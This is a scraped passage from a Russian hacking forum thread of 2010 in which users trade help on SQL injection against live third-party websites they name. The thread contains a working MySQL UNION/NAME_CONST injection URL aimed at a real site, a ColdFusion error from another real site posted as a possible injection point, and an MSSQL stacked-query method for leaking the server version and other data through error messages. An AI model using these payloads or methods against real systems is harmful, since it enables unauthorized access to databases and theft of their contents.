ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.03.2010, 20:00
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Кинь адрес сайта в ПМ попробую посмотреть...
|
|
|
18.03.2010, 20:58
|
|
Banned
Регистрация: 18.09.2008
Сообщений: 23
Провел на форуме:
94916
Репутация:
5
|
|
Сообщение от Assembler
Обычный фрейм.
Сделать ничего нельзя?
|
|
|
|
18.03.2010, 21:31
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от FAPSI
Сделать ничего нельзя?
нет..
|
|
|
|
19.03.2010, 19:51
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Люди подскажите если в ошибке, что-то типа:
Invalid data 2170; -- for CFSQLTYPE CF_SQL_INTEGER.
The error occurred in C:\Inetpub\wwwroot3\plugins\frontEnd\content.cfm: line 137
135 : AND clientID = <cfqueryparam cfsqltype="cf_sql_integer" value="#session.clientID#">
136 : <cfif isDefined("from") and from eq "backend">
137 : <cfelse>
138 : AND active = 1
139 : </cfif>
Что это значит? Дайте ссыль на инфу по этих инъекциях. |
|
|
|
19.03.2010, 20:10
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465
Репутация:
0
|
|
Есть слепая sql, не могу вывести из таблицы поля, помогите. Таблица ollis, смотрю так же inf_sch, что не то?
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+
|
|
|
|
19.03.2010, 20:14
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от CyberHunter
Люди подскажите если в ошибке, что-то типа:
Что это значит? Дайте ссыль на инфу по этих инъекциях.
обычная скуля мускульная , только скрипт на coldfusion и, походу, требует чтоб ID был цифровой - внедрить что-либо нельзя (это просто предположение, исходя из того что ты дал)
|
|
|
|
19.03.2010, 20:29
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Вот смотри:
http://www.asthmansw.org.au/content.cfm?id=2170
|
|
|
|
20.03.2010, 10:50
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от CyberHunter
Вот смотри:
Как сказал попугай, это просто ошибка из-за того что GET параметр ID не числовой, это так принято выводить ошибки в ASP.NET, и т.п. системах )
|
|
|
|
20.03.2010, 16:51
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Есть инъекция в MSSQL - выводит ошибку (с полным query) только если incorrect syntax, все остальные не показываются.
Задача - сделать вывод нужных данных в этой ошибке, т.е. используя выполнение многих запросов за раз с точкой с запятой, засунуть результат селекта в сам запрос.
Составил пока такой запрос:
declare @v as varchar(2048)
select @v = @@version;
exec @v
Msg 203, Level 16, State 2, Line 7
The name 'Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Developer Edition on Windows NT 6.1 (Build 7600: )
' is not a valid identifier.
Но ошибка вылазит, как видно, не на синтакс.
Может есть идеи?
Чтобы было понятнее: хочу получить вот такую ошибку:
Incorrect syntax: Microsoft
SQL : SELECT id, desc from table1 where id='-1';...сам хитрый запрос...; select Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 6.1 (Build 7600: )
Последний раз редактировалось budden; 20.03.2010 в 17:02..
|
|
|
|
20.03.2010, 17:57
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от budden
Есть инъекция в MSSQL - выводит ошибку (с полным query) только если incorrect syntax, все остальные не показываются.
Задача - сделать вывод нужных данных в этой ошибке, т.е. используя выполнение многих запросов за раз с точкой с запятой, засунуть результат селекта в сам запрос.
Составил пока такой запрос:
Но ошибка вылазит, как видно, не на синтакс.
Может есть идеи?
Чтобы было понятнее: хочу получить вот такую ошибку:
Incorrect syntax: Microsoft
SQL : SELECT id, desc from table1 where id='-1';...сам хитрый запрос...; select Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 6.1 (Build 7600: )
А зачем получать именно в таком виде ошибку? Главное же, что вывод данных есть. Можно данные ещё конкатенизировать с какими-то символами, провоцирующими ошибку при exec.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1993185){kind=avatar}
Похожие темы
Линейный вид
